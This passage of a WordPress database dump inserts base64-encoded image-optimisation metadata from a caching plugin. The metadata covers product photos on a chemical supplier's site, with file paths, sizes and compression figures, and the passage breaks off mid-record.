INSERT INTO `wp_postmeta` VALUES (29419, 1468, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwicmVkdWN0aW9uIjoyMzk2OTMwLCJ0aW1lIjoxNDgzNTY4NzY4LCJpZCI6IjE0NjgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODc3MSwiaWQiOjE0Njh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4Nzc0LCJpZCI6MTQ2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3NzcsImlkIjoxNDY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4NzgwLCJpZCI6MTQ2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3ODMsImlkIjoxNDY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODc4NSwiaWQiOjE0Njh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4Nzg4LCJpZCI6MTQ2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg3OTEsImlkIjoxNDY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxOTMsInRpbWUiOjE0ODM1Njg3OTQsImlkIjoxNDY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMTEsInRpbWUiOjE0ODM1Njg3OTYsImlkIjoxNDY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMjQsInRpbWUiOjE0ODM1Njg3OTksImlkIjoxNDY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODAyLCJpZCI6MTQ2OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODgwNCwiaWQiOjE0Njh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4MDcsImlkIjoxNDY4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODIwMC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04MjAwLXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyMDAtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODA5LCJpZCI6MTQ2OH1d'); 
INSERT INTO `wp_postmeta` VALUES (29420, 1467, 'wpfc_optimisation_reduction', '2424364'); 
INSERT INTO `wp_postmeta` VALUES (29421, 1467, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjcuanBnIiwicmVkdWN0aW9uIjoyNDI0MjE2LCJ0aW1lIjoxNDgzNTY4ODIxLCJpZCI6IjE0NjcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODgyMywiaWQiOjE0Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODI2LCJpZCI6MTQ2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4MzAsImlkIjoxNDY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY4ODMzLCJpZCI6MTQ2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njg4MzYsImlkIjoxNDY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24taGVsb3h5LW1vZGlmaWVyLTY3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2ODgzOCwiaWQiOjE0Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWhlbG94eS1tb2RpZmllci02Ny0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1oZWxveHktbW9kaWZpZXItNjctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX